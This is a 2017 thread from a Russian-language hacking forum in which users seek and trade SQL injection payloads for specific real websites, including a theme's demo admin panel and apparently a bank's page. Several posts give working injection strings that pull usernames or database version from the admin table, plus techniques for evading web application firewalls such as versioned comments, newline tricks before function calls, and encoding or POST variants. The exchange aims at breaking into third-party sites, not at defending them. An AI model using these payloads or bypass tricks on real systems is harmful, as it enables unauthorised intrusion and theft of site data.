 |
|
31.05.2017, 08:48
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами:
9979143
Репутация:
-5
|
|
Добрый подскажите, как раскрутить данную sql (параметр id)
.SpoilerTarget" type="button">Spoiler: посмотреть
Авторизация:
Код:
bringthemes.com/natural-food/home-1/admin/ (demo/demo)
Пробую:
Код:
bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&token=Hc0bs042rmLz50tctvPv2grNiWgYZqaF&id='+AND+EXTRACTVALUE(5632,CONCAT(0x3a,((select(substring(group_concat(username),1,32))from(oc_user)))))--+uHHl
но в ответ постоянная загрузка и отрубает (Error - Connection reset)
Подскажите что фильтрует и как обойти?
обратил внимание что не нравится ему select и group_concat, но могу ошибаться в разных вариациях не выходит никак(( |
|
|
31.05.2017, 20:51
|
|
Постоянный
Регистрация: 17.03.2014
Сообщений: 530
С нами:
6398966
Репутация:
154
|
|
Сообщение от kacergei
↑
Добрый подскажите, как раскрутить данную sql (параметр id)
Spoiler: посмотреть
Авторизация:
Код:
bringthemes.com/natural-food/home-1/admin/ (demo/demo)
Пробую:
Код:
bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&token=Hc0bs042rmLz50tctvPv2grNiWgYZqaF&id='+AND+EXTRACTVALUE(5632,CONCAT(0x3a,((select(substring(group_concat(username),1,32))from(oc_user)))))--+uHHl
но в ответ постоянная загрузка и отрубает (Error - Connection reset)
Подскажите что фильтрует и как обойти?
обратил внимание что не нравится ему select и group_concat, но могу ошибаться в разных вариациях не выходит никак((
Зачем идти в Москву через Китай
Код:
http://bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&id=-1 union /*!12345select*/ 1,2,3,4,user(),version%0A(),7 --+uHHl&token=nGLvYhzmGxV0JoQDKfwjr1xiBwes8qoF
Бапассить select можно старыми добрыми комментами
А байпассить функции с помощью %0A перед ()
UPD: И ты используешь error-based хотя здесь самый обычный UNION
|
|
|
|
31.05.2017, 22:36
|
|
Познающий
Регистрация: 23.06.2013
Сообщений: 31
С нами:
6783446
Репутация:
0
|
|
/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23
Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.
|
|
|
|
01.06.2017, 01:29
|
|
Постоянный
Регистрация: 17.03.2014
Сообщений: 530
С нами:
6398966
Репутация:
154
|
|
Сообщение от extjs
↑
/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23
Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.
Таргет дай нормальный, векторов куча, если hacking attemp - это скорее всего mod security - он байпассится в том числе векторов на один пост выше
|
|
|
|
01.06.2017, 09:13
|
|
Новичок
Регистрация: 24.04.2012
Сообщений: 1
С нами:
7395446
Репутация:
0
|
|
Сообщение от brown
↑
google phpbb 3.0.5 exploit
Благодарю, но хотелось бы развернутого ответа, если не сложно.
|
|
|
|
01.06.2017, 09:49
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от extjs
↑
/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23
Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.
/!*50000bla bla bla*/
|
|
|
|
01.06.2017, 13:49
|
|
Участник форума
Регистрация: 10.03.2017
Сообщений: 159
С нами:
4830806
Репутация:
0
|
|
Сообщение от extjs
↑
/vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23
Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.
попробуй передать id с помощью POST
Попробуй url encode
Попробуй char encode
|
|
|
|
10.06.2017, 00:16
|
|
Новичок
Регистрация: 25.04.2010
Сообщений: 0
С нами:
8445343
Репутация:
0
|
|
всем привет,
кто может, помогиет раскрутить эту скулю:
Код:
http://www.sala amsombank.com/pages.php?id=\
|
|
|
|
10.06.2017, 02:25
|
|
Участник форума
Регистрация: 10.03.2017
Сообщений: 159
С нами:
4830806
Репутация:
0
|
|
Сообщение от sepo
↑
всем привет,
кто может, помогиет раскрутить эту скулю:
Код:
http://www.sala amsombank.com/pages.php?id=\
с чего вы решили, что она раскручивабельна?
|
|
|
|
10.06.2017, 03:21
|
|
Новичок
Регистрация: 25.04.2010
Сообщений: 0
С нами:
8445343
Репутация:
0
|
|
Сообщение от ACat
↑
с чего вы решили, что она раскручивабельна?
всмысле??
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
